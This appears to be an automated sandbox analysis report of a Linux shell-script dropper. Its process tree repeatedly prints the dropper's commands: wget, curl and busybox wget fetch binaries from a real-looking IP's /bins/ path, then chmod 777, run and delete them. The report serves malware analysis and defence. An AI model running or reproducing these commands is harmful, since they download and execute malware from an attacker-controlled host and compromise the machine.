Analysis Overview
SHA256
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
Threat Level: Shows suspicious behavior
The file 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 02:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 02:06
Reported
2024-11-24 02:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
46s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /usr/bin/curl | N/A |
Processes
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
[/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
